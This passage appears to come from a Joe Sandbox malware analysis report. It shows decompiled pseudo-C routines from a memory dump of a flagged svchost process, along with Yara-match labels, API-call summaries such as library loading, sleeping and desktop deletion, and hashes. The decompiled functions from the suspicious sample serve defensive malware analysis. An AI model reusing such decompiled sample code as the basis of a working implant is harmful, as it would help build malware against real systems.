                                                            				 *((intOrPtr*)(_t127 + 8)) =  *((intOrPtr*)(_t127 + 8)) + 1;
                                                            				 *((intOrPtr*)(_t127 + 4)) =  *((intOrPtr*)(_t127 + 4)) + 1;
                                                            				goto 0xaf57604c;
                                                            				 *((char*)( *((intOrPtr*)(0xaf599790 + _t163 * 8)) + _t148 + 0x3e)) =  *((intOrPtr*)(_t145 + 1));
                                                            				 *( *((intOrPtr*)(0xaf599790 + _t163 * 8)) + _t148 + 0x3d) =  *( *((intOrPtr*)(0xaf599790 + _t163 * 8)) + _t148 + 0x3d) | 0x00000004;
                                                            				 *((intOrPtr*)(_t127 + 4)) =  *((intOrPtr*)(_t127 + 4)) + 1;
                                                            				goto 0xaf5761b6;
                                                            				 *_t127 = GetLastError();
                                                            				return E0000022B22BAF55A7C0( *((intOrPtr*)(_t127 + 8)) - _v96 + __edi, _t127, _v72 ^ _t150 - 0x00000080);
                                                            			}































                                                            0x22baf575fd8
                                                            0x22baf575fd8
                                                            0x22baf575ff2
                                                            0x22baf575ffc
                                                            0x22baf57600d
                                                            0x22baf576010
                                                            0x22baf576017
                                                            0x22baf57601e
                                                            0x22baf576022
                                                            0x22baf576025
                                                            0x22baf576031
                                                            0x22baf57603d
                                                            0x22baf576040
                                                            0x22baf576046
                                                            0x22baf57604c
                                                            0x22baf576052
                                                            0x22baf57605c
                                                            0x22baf576060
                                                            0x22baf576064
                                                            0x22baf57606b
                                                            0x22baf576074
                                                            0x22baf576078
                                                            0x22baf576082
                                                            0x22baf576085
                                                            0x22baf576089
                                                            0x22baf57608b
                                                            0x22baf57609c
                                                            0x22baf5760a1
                                                            0x22baf5760a7
                                                            0x22baf5760bc
                                                            0x22baf5760c2
                                                            0x22baf5760c5
                                                            0x22baf5760c7
                                                            0x22baf5760dc
                                                            0x22baf5760e2
                                                            0x22baf5760ec
                                                            0x22baf5760f9
                                                            0x22baf5760ff
                                                            0x22baf576109
                                                            0x22baf576111
                                                            0x22baf576117
                                                            0x22baf57611c
                                                            0x22baf57612a
                                                            0x22baf576130
                                                            0x22baf576134
                                                            0x22baf576141
                                                            0x22baf57614b
                                                            0x22baf576152
                                                            0x22baf576158
                                                            0x22baf57615e
                                                            0x22baf576161
                                                            0x22baf576166
                                                            0x22baf576166
                                                            0x22baf57616e
                                                            0x22baf576180
                                                            0x22baf576186
                                                            0x22baf576188
                                                            0x22baf57618b
                                                            0x22baf576191
                                                            0x22baf57619c
                                                            0x22baf5761a4
                                                            0x22baf5761a9
                                                            0x22baf5761ac
                                                            0x22baf5761b4
                                                            0x22baf5761df

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                            • String ID:
                                                            • API String ID: 3659116390-0
                                                            • Opcode ID: 434b4124afa634618df54b116c8fb812a7d0b25ff49f88d0f3b0970f47e539e7
                                                            • Instruction ID: 9a3cad3258c8ae5cf7608128a7647974d56fcdf586ce006f78c9a5efe795b030
                                                            • Opcode Fuzzy Hash: 434b4124afa634618df54b116c8fb812a7d0b25ff49f88d0f3b0970f47e539e7
                                                            • Instruction Fuzzy Hash: 5F519D33A10A50A9EB22CFA5D94C3DD7BB0F744B98F048515DE4A57A9ADF35C146C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E0000022B22BAF53A310(void* __ecx, void* __eflags, long long __rbx, void* __rdx, long long __rdi, long long __rsi, void* __r8) {
                                                            				void* _t46;
                                                            				signed long long _t55;
                                                            				long long _t74;
                                                            				void* _t77;
                                                            				void* _t78;
                                                            				void* _t80;
                                                            				signed long long _t81;
                                                            
                                                            				_t74 = __rdi;
                                                            				_t46 = __ecx;
                                                            				 *((long long*)(_t80 + 8)) = __rbx;
                                                            				 *((long long*)(_t80 + 0x10)) = __rdi;
                                                            				_t78 = _t80 - 0xc0;
                                                            				_t81 = _t80 - 0x1c0;
                                                            				_t55 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *(_t78 + 0xb0) = _t55 ^ _t81;
                                                            				E0000022B22BAF538B60(_t55 ^ _t81, __rbx, _t81 + 0x30, __rdi, __rsi);
                                                            				 *((char*)(_t78 - 0x60)) = 0x43;
                                                            				 *((long long*)(_t78 - 0x80)) = _t74;
                                                            				 *((long long*)(_t81 + 0x78)) = 0xaf588810;
                                                            				 *((long long*)(_t78 - 0x70)) = _t74;
                                                            				 *((long long*)(_t78 - 0x78)) = 0xaf5887c8;
                                                            				 *((intOrPtr*)(_t78 - 0x38)) = 0;
                                                            				 *((long long*)(_t78 - 0x48)) = _t74;
                                                            				 *((long long*)(_t78 - 0x40)) = _t74;
                                                            				 *((intOrPtr*)(_t78 - 0x5c)) = 0;
                                                            				 *((long long*)(_t81 + 0x68)) = _t74;
                                                            				 *((long long*)(_t81 + 0x70)) = _t74;
                                                            				 *((long long*)(_t78 - 0x68)) = _t74;
                                                            				E0000022B22BAF53A030();
                                                            				r8d =  *0xaf5958f0 & 0x0000ffff;
                                                            				 *((long long*)(_t78 - 0x58)) = _t74;
                                                            				if (( *(_t78 - 0x30) & 0x0000ffff) != 1) goto 0xaf53a44c;
                                                            				 *((short*)(_t81 + 0x28)) = 0;
                                                            				r9d = 0;
                                                            				 *((long long*)(_t81 + 0x20)) = _t74;
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t81 + 0x68))))))(_t77) != 0) goto 0xaf53a4b9;
                                                            				E0000022B22BAF53A220( *0xaf599c28 & 0xffff, _t81 + 0x30);
                                                            				if ( *((intOrPtr*)(_t78 - 0x48)) == 0) goto 0xaf53a3f5;
                                                            				E0000022B22BAF55A7E4( *((intOrPtr*)( *((intOrPtr*)(_t81 + 0x68)))),  *((intOrPtr*)(_t78 - 0x48)));
                                                            				 *((long long*)(_t78 - 0x78)) = 0xaf588690;
                                                            				 *((long long*)(_t81 + 0x78)) = 0xaf588790;
                                                            				 *((intOrPtr*)(_t78 - 0x38)) = 0;
                                                            				 *((long long*)(_t78 - 0x48)) = _t74;
                                                            				 *((long long*)(_t78 - 0x40)) = _t74;
                                                            				if ( *((intOrPtr*)(_t81 + 0x60)) == 0) goto 0xaf53a426;
                                                            				E0000022B22BAF55A7E4(0xaf588790,  *((intOrPtr*)(_t81 + 0x60)));
                                                            				return E0000022B22BAF55A7C0(_t46, 0xaf588790,  *(_t78 + 0xb0) ^ _t81);
                                                            			}










                                                            0x22baf53a310
                                                            0x22baf53a310
                                                            0x22baf53a310
                                                            0x22baf53a315
                                                            0x22baf53a31b
                                                            0x22baf53a323
                                                            0x22baf53a32a
                                                            0x22baf53a334
                                                            0x22baf53a347
                                                            0x22baf53a34e
                                                            0x22baf53a359
                                                            0x22baf53a35d
                                                            0x22baf53a36e
                                                            0x22baf53a375
                                                            0x22baf53a379
                                                            0x22baf53a37c
                                                            0x22baf53a380
                                                            0x22baf53a384
                                                            0x22baf53a387
                                                            0x22baf53a38c
                                                            0x22baf53a391
                                                            0x22baf53a395
                                                            0x22baf53a39e
                                                            0x22baf53a3a6
                                                            0x22baf53a3ae
                                                            0x22baf53a3c0
                                                            0x22baf53a3c5
                                                            0x22baf53a3c8
                                                            0x22baf53a3d4
                                                            0x22baf53a3e2
                                                            0x22baf53a3ee
                                                            0x22baf53a3f0
                                                            0x22baf53a401
                                                            0x22baf53a40c
                                                            0x22baf53a411
                                                            0x22baf53a414
                                                            0x22baf53a418
                                                            0x22baf53a41f
                                                            0x22baf53a421
                                                            0x22baf53a44b

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$Close$DeleteDesktopHandleLibraryLoadReleaseSleep
                                                            • String ID:
                                                            • API String ID: 3912153519-0
                                                            • Opcode ID: 4dd78ee09022e8c28f5d897e7a244c3b1690d1402d5fbdc85ac9ff286346804e
                                                            • Instruction ID: 91394fc81f22cc023c5931d93b5220c09fe0886c281816b8fdc19aec4908d270
                                                            • Opcode Fuzzy Hash: 4dd78ee09022e8c28f5d897e7a244c3b1690d1402d5fbdc85ac9ff286346804e
                                                            • Instruction Fuzzy Hash: 5C612A37610B80A9EB21DFA5E89C2DD77B4FB84798F500116DA8D47AAADF3AC445C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E0000022B22BAF53B270(void* __ecx, void* __eflags, long long __rbx, void* __rdx, long long __rdi, long long __rsi, void* __r8) {
                                                            				void* _t46;
                                                            				signed long long _t55;
                                                            				long long _t74;
                                                            				void* _t77;
                                                            				void* _t78;
                                                            				void* _t80;
                                                            				signed long long _t81;
                                                            
                                                            				_t74 = __rdi;
                                                            				_t46 = __ecx;
                                                            				 *((long long*)(_t80 + 8)) = __rbx;
                                                            				 *((long long*)(_t80 + 0x10)) = __rdi;
                                                            				_t78 = _t80 - 0x140;
                                                            				_t81 = _t80 - 0x240;
                                                            				_t55 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *(_t78 + 0x130) = _t55 ^ _t81;
                                                            				E0000022B22BAF538B60(_t55 ^ _t81, __rbx, _t81 + 0x30, __rdi, __rsi);
                                                            				 *((char*)(_t78 - 0x60)) = 0x43;
                                                            				 *((long long*)(_t78 - 0x80)) = _t74;
                                                            				 *((long long*)(_t81 + 0x78)) = 0xaf588810;
                                                            				 *((long long*)(_t78 - 0x70)) = _t74;
                                                            				 *((long long*)(_t78 - 0x78)) = 0xaf5887c8;
                                                            				 *((intOrPtr*)(_t78 - 0x38)) = 0;
                                                            				 *((long long*)(_t78 - 0x48)) = _t74;
                                                            				 *((long long*)(_t78 - 0x40)) = _t74;
                                                            				 *((intOrPtr*)(_t78 - 0x5c)) = 0;
                                                            				 *((long long*)(_t81 + 0x68)) = _t74;
                                                            				 *((long long*)(_t81 + 0x70)) = _t74;
                                                            				 *((long long*)(_t78 - 0x68)) = _t74;
                                                            				E0000022B22BAF53A030();
                                                            				r8d =  *0xaf5958f0 & 0x0000ffff;
                                                            				 *((long long*)(_t78 - 0x58)) = _t74;
                                                            				if (( *(_t78 - 0x30) & 0x0000ffff) != 1) goto 0xaf53b3ac;
                                                            				 *((short*)(_t81 + 0x28)) = 0;
                                                            				r9d = 0;
                                                            				 *((long long*)(_t81 + 0x20)) = _t74;
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t81 + 0x68))))))(_t77) != 0) goto 0xaf53b419;
                                                            				E0000022B22BAF53A220( *0xaf599c28 & 0xffff, _t81 + 0x30);
                                                            				if ( *((intOrPtr*)(_t78 - 0x48)) == 0) goto 0xaf53b355;
                                                            				E0000022B22BAF55A7E4( *((intOrPtr*)( *((intOrPtr*)(_t81 + 0x68)))),  *((intOrPtr*)(_t78 - 0x48)));
                                                            				 *((long long*)(_t78 - 0x78)) = 0xaf588690;
                                                            				 *((long long*)(_t81 + 0x78)) = 0xaf588790;
                                                            				 *((intOrPtr*)(_t78 - 0x38)) = 0;
                                                            				 *((long long*)(_t78 - 0x48)) = _t74;
                                                            				 *((long long*)(_t78 - 0x40)) = _t74;
                                                            				if ( *((intOrPtr*)(_t81 + 0x60)) == 0) goto 0xaf53b386;
                                                            				E0000022B22BAF55A7E4(0xaf588790,  *((intOrPtr*)(_t81 + 0x60)));
                                                            				return E0000022B22BAF55A7C0(_t46, 0xaf588790,  *(_t78 + 0x130) ^ _t81);
                                                            			}










                                                            0x22baf53b270
                                                            0x22baf53b270
                                                            0x22baf53b270
                                                            0x22baf53b275
                                                            0x22baf53b27b
                                                            0x22baf53b283
                                                            0x22baf53b28a
                                                            0x22baf53b294
                                                            0x22baf53b2a7
                                                            0x22baf53b2ae
                                                            0x22baf53b2b9
                                                            0x22baf53b2bd
                                                            0x22baf53b2ce
                                                            0x22baf53b2d5
                                                            0x22baf53b2d9
                                                            0x22baf53b2dc
                                                            0x22baf53b2e0
                                                            0x22baf53b2e4
                                                            0x22baf53b2e7
                                                            0x22baf53b2ec
                                                            0x22baf53b2f1
                                                            0x22baf53b2f5
                                                            0x22baf53b2fe
                                                            0x22baf53b306
                                                            0x22baf53b30e
                                                            0x22baf53b320
                                                            0x22baf53b325
                                                            0x22baf53b328
                                                            0x22baf53b334
                                                            0x22baf53b342
                                                            0x22baf53b34e
                                                            0x22baf53b350
                                                            0x22baf53b361
                                                            0x22baf53b36c
                                                            0x22baf53b371
                                                            0x22baf53b374
                                                            0x22baf53b378
                                                            0x22baf53b37f
                                                            0x22baf53b381
                                                            0x22baf53b3ab

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressCloseHandleProc$LibraryLoadObjectSingleSleepWait
                                                            • String ID:
                                                            • API String ID: 594132814-0
                                                            • Opcode ID: 0e57eb95f36bce82815cf22166d20aa81c2455632047c3aed7f0ec454f53c864
                                                            • Instruction ID: 54568a3347231ec395ac4a3bfe7b08215dcabd8729f675cd61821081e6c77d52
                                                            • Opcode Fuzzy Hash: 0e57eb95f36bce82815cf22166d20aa81c2455632047c3aed7f0ec454f53c864
                                                            • Instruction Fuzzy Hash: 77612B33610B44A9EB21CFA9E8A82DD77F4FB84798F500216DA9D43AAADF39C445C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Timetime$FreeHeap
                                                            • String ID:
                                                            • API String ID: 3205547609-0
                                                            • Opcode ID: dc98cffcc3435f71589508573339223eab46a8408da5854a14efb6f641a941b0
                                                            • Instruction ID: ee89ddf638701efa4f6b53b9335ba55b8d2f7643111c482131a5b6eaa24f2561
                                                            • Opcode Fuzzy Hash: dc98cffcc3435f71589508573339223eab46a8408da5854a14efb6f641a941b0
                                                            • Instruction Fuzzy Hash: 5351B737201A5096E7239FAAD44C39E73A5F784F98F198425CE595779ADF3AC882C3C0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 79%
                                                            			E0000022B22BAF533F50(void* __eax, signed char __ecx, long long __rbx, long long __rcx, unsigned int __rdx, long long __r8, void* _a8, long long _a16, void* _a24, long long _a32) {
                                                            				long long _v48;
                                                            				long long _v56;
                                                            				void* __rdi;
                                                            				void* __rsi;
                                                            				void* _t43;
                                                            				signed char _t44;
                                                            				void* _t46;
                                                            				void* _t47;
                                                            				void* _t48;
                                                            				intOrPtr _t73;
                                                            				void* _t74;
                                                            				intOrPtr _t76;
                                                            				long long* _t81;
                                                            				unsigned long long _t86;
                                                            				long long _t90;
                                                            				void* _t91;
                                                            				long long _t102;
                                                            				long long _t106;
                                                            				unsigned long long _t111;
                                                            				signed long long _t116;
                                                            				signed long long _t118;
                                                            
                                                            				_t44 = __ecx;
                                                            				_a24 = __r8;
                                                            				_a16 = __rdx;
                                                            				_a8 = __rcx;
                                                            				_v48 = 0xfffffffe;
                                                            				_a32 = __rbx;
                                                            				if ((__rdx | 0x00000007) - 0xfffffffe <= 0) goto 0xaf533f9a;
                                                            				goto 0xaf533fcb;
                                                            				_t111 =  *((intOrPtr*)(__rcx + 0x18));
                                                            				_t86 = _t111 >> 1;
                                                            				if (_t86 - __rdx >> 1 <= 0) goto 0xaf533fcb;
                                                            				if (_t111 - 0xfffffffe - _t86 <= 0) goto 0xaf533fcb;
                                                            				if (0x7fffffffffffffff != 0) goto 0xaf533fe6;
                                                            				r14d = 0;
                                                            				_t47 = r14d;
                                                            				goto 0xaf53402c;
                                                            				if (0x7fffffffffffffff - 0xffffffff <= 0) goto 0xaf533ff0;
                                                            				E0000022B22BAF55B374(0x7fffffffffffffff - 0xffffffff, 0x7fffffffffffffff);
                                                            				if (0xfffffffffffffffe - 0x1000 < 0) goto 0xaf534021;
                                                            				if (0x25 - 0xfffffffffffffffe > 0) goto 0xaf53400b;
                                                            				E0000022B22BAF55B374(0x25 - 0xfffffffffffffffe, 0x25);
                                                            				E0000022B22BAF55A7EC(0x25, 0x25);
                                                            				 *0x00000038 = 0x25;
                                                            				goto 0xaf534029;
                                                            				E0000022B22BAF55A7EC(0x25, 0x25);
                                                            				r14d = 0;
                                                            				_v56 = 0x25;
                                                            				r14d = 0;
                                                            				_t81 = _a8;
                                                            				_t118 = _a24;
                                                            				_t102 = _a16;
                                                            				_t106 = _v56;
                                                            				if (_t118 == 0) goto 0xaf534079;
                                                            				if ( *((long long*)(_t81 + 0x18)) - 8 < 0) goto 0xaf534065;
                                                            				goto 0xaf534068;
                                                            				if (_t118 == 0) goto 0xaf534079;
                                                            				_t43 = E0000022B22BAF562BA0(__ecx, _t46, _t47, _t48, _t106, _t81, _t102, _t106, _t118 + _t118);
                                                            				_t73 =  *((intOrPtr*)(_t81 + 0x18));
                                                            				if (_t73 - 8 < 0) goto 0xaf5340dc;
                                                            				_t74 = _t73 + 1;
                                                            				_t90 =  *_t81;
                                                            				if (_t74 - 0xffffffff <= 0) goto 0xaf534094;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				if (_t74 + _t74 - 0x1000 < 0) goto 0xaf5340d7;
                                                            				if ((_t44 & 0x0000001f) == 0) goto 0xaf5340aa;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				_t76 =  *((intOrPtr*)(_t90 - 8));
                                                            				if (_t76 - _t90 < 0) goto 0xaf5340b9;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				_t91 = _t90 - _t76;
                                                            				if (_t91 - 8 >= 0) goto 0xaf5340c8;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				if (_t91 - 0x27 <= 0) goto 0xaf5340d4;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				0xaf55a85c();
                                                            				 *((long long*)(_t81 + 0x18)) = 7;
                                                            				 *(_t81 + 0x10) = _t116;
                                                            				if ( *((long long*)(_t81 + 0x18)) - 8 < 0) goto 0xaf5340f4;
                                                            				goto 0xaf5340f7;
                                                            				 *_t81 = r14w;
                                                            				 *_t81 = _t106;
                                                            				 *((long long*)(_t81 + 0x18)) = _t102;
                                                            				 *(_t81 + 0x10) = _t118;
                                                            				if ( *((long long*)(_t81 + 0x18)) - 8 < 0) goto 0xaf534110;
                                                            				 *((intOrPtr*)(_t106 + _t118 * 2)) = r14w;
                                                            				return _t43;
                                                            			}
























                                                            0x22baf533f50
                                                            0x22baf533f50
                                                            0x22baf533f55
                                                            0x22baf533f5a
                                                            0x22baf533f6b
                                                            0x22baf533f74
                                                            0x22baf533f93
                                                            0x22baf533f98
                                                            0x22baf533f9a
                                                            0x22baf533fa1
                                                            0x22baf533fb7
                                                            0x22baf533fc6
                                                            0x22baf533fdc
                                                            0x22baf533fde
                                                            0x22baf533fe1
                                                            0x22baf533fe4
                                                            0x22baf533fe9
                                                            0x22baf533feb
                                                            0x22baf533ffb
                                                            0x22baf534004
                                                            0x22baf534006
                                                            0x22baf53400e
                                                            0x22baf53401b
                                                            0x22baf53401f
                                                            0x22baf534021
                                                            0x22baf534029
                                                            0x22baf53402c
                                                            0x22baf534033
                                                            0x22baf534040
                                                            0x22baf534045
                                                            0x22baf53404a
                                                            0x22baf53404f
                                                            0x22baf534057
                                                            0x22baf53405e
                                                            0x22baf534063
                                                            0x22baf53406b
                                                            0x22baf534074
                                                            0x22baf534079
                                                            0x22baf534081
                                                            0x22baf534083
                                                            0x22baf534086
                                                            0x22baf53408c
                                                            0x22baf53408e
                                                            0x22baf534093
                                                            0x22baf53409d
                                                            0x22baf5340a2
                                                            0x22baf5340a4
                                                            0x22baf5340a9
                                                            0x22baf5340aa
                                                            0x22baf5340b1
                                                            0x22baf5340b3
                                                            0x22baf5340b8
                                                            0x22baf5340b9
                                                            0x22baf5340c0
                                                            0x22baf5340c2
                                                            0x22baf5340c7
                                                            0x22baf5340cc
                                                            0x22baf5340ce
                                                            0x22baf5340d3
                                                            0x22baf5340d7
                                                            0x22baf5340dc
                                                            0x22baf5340e4
                                                            0x22baf5340ed
                                                            0x22baf5340f2
                                                            0x22baf5340f7
                                                            0x22baf5340fb
                                                            0x22baf5340fe
                                                            0x22baf534102
                                                            0x22baf53410b
                                                            0x22baf534110
                                                            0x22baf534126

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$ExceptionThrowstd::bad_alloc::bad_alloc
                                                            • String ID:
                                                            • API String ID: 545805781-0
                                                            • Opcode ID: 7529e5906e87b3715305b4374d1fc76e318a1d532acb5d33b004be61e9267215
                                                            • Instruction ID: 6f859baeeadef4b5f36e6535dc37084ffdf4c58b074ffde26c3613a4e5ef318a
                                                            • Opcode Fuzzy Hash: 7529e5906e87b3715305b4374d1fc76e318a1d532acb5d33b004be61e9267215
                                                            • Instruction Fuzzy Hash: E441C523714744A1EA3A9BE9D06D3DD77A0E744BE4F5407209A790B7E7DF7AC491C280
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 49%
                                                            			E0000022B22BAF533CA0(signed int __edx, long long __rbx, void* __rdx, signed int __r8, long long _a8, signed long long _a16, long long _a24) {
                                                            				long long _v56;
                                                            				void* _t23;
                                                            				void* _t24;
                                                            				signed long long _t42;
                                                            				long long _t44;
                                                            				void* _t46;
                                                            				signed long long _t51;
                                                            				void* _t56;
                                                            				signed long long _t57;
                                                            				long long _t63;
                                                            				signed long long _t66;
                                                            				void* _t81;
                                                            				intOrPtr _t83;
                                                            				void* _t85;
                                                            				void* _t91;
                                                            				signed long long _t92;
                                                            
                                                            				if (__r8 - 0xffffffff > 0) goto 0xaf533cec;
                                                            				if (__r8 << 5 - 0x1000 < 0) goto 0xaf533ce0;
                                                            				if ((__edx & 0x0000001f) != 0) goto 0xaf533cf2;
                                                            				_t42 =  *((intOrPtr*)(__rdx - 8));
                                                            				if (_t42 - __rdx >= 0) goto 0xaf533cf8;
                                                            				_t56 = __rdx - _t42;
                                                            				if (_t56 - 8 < 0) goto 0xaf533cfe;
                                                            				if (_t56 - 0x27 > 0) goto 0xaf533d04;
                                                            				_t57 = _t42;
                                                            				goto 0xaf55a85c;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				_a16 = _t57;
                                                            				_v56 = 0xfffffffe;
                                                            				_a8 = __rbx;
                                                            				_t66 = _t57;
                                                            				_t92 = _t57;
                                                            				if (_t57 != 0) goto 0xaf533d3e;
                                                            				goto 0xaf533d90;
                                                            				if (_t66 - 0xffffffff <= 0) goto 0xaf533d53;
                                                            				E0000022B22BAF55B374(_t66 - 0xffffffff, 0xffffffff);
                                                            				asm("int3");
                                                            				_t51 = _t66 << 5;
                                                            				if (_t51 - 0x1000 < 0) goto 0xaf533d88;
                                                            				_t44 = _t51 + 0x27;
                                                            				if (_t44 - _t51 > 0) goto 0xaf533d72;
                                                            				E0000022B22BAF55B374(_t44 - _t51, _t44);
                                                            				asm("int3");
                                                            				E0000022B22BAF55A7EC(_t44, _t44);
                                                            				_t8 = _t44 + 0x27; // 0x27
                                                            				 *((long long*)((_t8 & 0xffffffe0) - 8)) = _t44;
                                                            				goto 0xaf533d90;
                                                            				E0000022B22BAF55A7EC(_t44, _t44);
                                                            				_t63 = _t44;
                                                            				_a24 = _t63;
                                                            				E0000022B22BAF5341E0(__rbx,  *_t92,  *((intOrPtr*)(_t92 + 8)), _t63, _t81, _t91, _t85);
                                                            				_t83 =  *((intOrPtr*)(_t92 + 8));
                                                            				_t46 =  *_t92;
                                                            				if (_t46 == 0) goto 0xaf533de4;
                                                            				if (_t46 == _t83) goto 0xaf533dd1;
                                                            				E0000022B22BAF5339E0(_t24, _t46);
                                                            				if (_t46 + 0x20 != _t83) goto 0xaf533dc0;
                                                            				_t23 = E0000022B22BAF533CA0(__edx, _t46 + 0x20,  *_t92,  *((intOrPtr*)(_t92 + 0x10)) -  *_t92 >> 5);
                                                            				 *((long long*)(_t92 + 0x10)) = (_t66 << 5) + _t63;
                                                            				 *((long long*)(_t92 + 8)) = (_t83 - _t46 & 0xffffffe0) + _t63;
                                                            				 *_t92 = _t63;
                                                            				return _t23;
                                                            			}



















                                                            0x22baf533cb1
                                                            0x22baf533cbe
                                                            0x22baf533cc3
                                                            0x22baf533cc5
                                                            0x22baf533ccc
                                                            0x22baf533cce
                                                            0x22baf533cd5
                                                            0x22baf533cdb
                                                            0x22baf533cdd
                                                            0x22baf533ce7
                                                            0x22baf533cec
                                                            0x22baf533cf1
                                                            0x22baf533cf2
                                                            0x22baf533cf7
                                                            0x22baf533cf8
                                                            0x22baf533cfd
                                                            0x22baf533cfe
                                                            0x22baf533d03
                                                            0x22baf533d04
                                                            0x22baf533d09
                                                            0x22baf533d0a
                                                            0x22baf533d0b
                                                            0x22baf533d0c
                                                            0x22baf533d0d
                                                            0x22baf533d0e
                                                            0x22baf533d0f
                                                            0x22baf533d10
                                                            0x22baf533d21
                                                            0x22baf533d2a
                                                            0x22baf533d2f
                                                            0x22baf533d32
                                                            0x22baf533d38
                                                            0x22baf533d3c
                                                            0x22baf533d4b
                                                            0x22baf533d4d
                                                            0x22baf533d52
                                                            0x22baf533d56
                                                            0x22baf533d61
                                                            0x22baf533d63
                                                            0x22baf533d6a
                                                            0x22baf533d6c
                                                            0x22baf533d71
                                                            0x22baf533d75
                                                            0x22baf533d7a
                                                            0x22baf533d82
                                                            0x22baf533d86
                                                            0x22baf533d88
                                                            0x22baf533d8d
                                                            0x22baf533d90
                                                            0x22baf533da2
                                                            0x22baf533da8
                                                            0x22baf533dac
                                                            0x22baf533db8
                                                            0x22baf533dbd
                                                            0x22baf533dc3
                                                            0x22baf533dcf
                                                            0x22baf533ddf
                                                            0x22baf533deb
                                                            0x22baf533df6
                                                            0x22baf533dfa
                                                            0x22baf533e0e

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-0
                                                            • Opcode ID: 616776360d69c0df53f5b8a98a5ba5b6477e15545e62a79319f9d1e792d08afc
                                                            • Instruction ID: d7b161c84374587e28d5ea8ddeb0785b55b994ec6d070ad3e320156cdc0f4546
                                                            • Opcode Fuzzy Hash: 616776360d69c0df53f5b8a98a5ba5b6477e15545e62a79319f9d1e792d08afc
                                                            • Instruction Fuzzy Hash: D931F0A771178461E936AAEAE41D3DD73A0AB047F0F165B229A7903BD7EF76C0818300
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 36%
                                                            			E0000022B22BAF56F93C(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                            				signed long long _t72;
                                                            				signed long long _t76;
                                                            				intOrPtr _t78;
                                                            				signed long long _t80;
                                                            				signed long long _t89;
                                                            				struct HINSTANCE__* _t94;
                                                            				signed long long _t95;
                                                            				long long _t101;
                                                            				void* _t105;
                                                            				signed long long _t109;
                                                            				signed long long _t111;
                                                            				signed long long _t114;
                                                            				struct HINSTANCE__* _t115;
                                                            				long _t118;
                                                            				void* _t121;
                                                            				WCHAR* _t123;
                                                            
                                                            				 *((long long*)(_t105 + 8)) = __rbx;
                                                            				 *((long long*)(_t105 + 0x10)) = _t101;
                                                            				 *((long long*)(_t105 + 0x18)) = __rsi;
                                                            				r14d = __ecx;
                                                            				_t111 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t95 = _t94 | 0xffffffff;
                                                            				_t89 = _t111 ^  *(0x22baf530000 + 0x69630 + _t121 * 8);
                                                            				asm("dec eax");
                                                            				if (_t89 == _t95) goto 0xaf56fabd;
                                                            				if (_t89 == 0) goto 0xaf56f9a5;
                                                            				_t72 = _t89;
                                                            				goto 0xaf56fabf;
                                                            				if (__r8 == __r9) goto 0xaf56fa51;
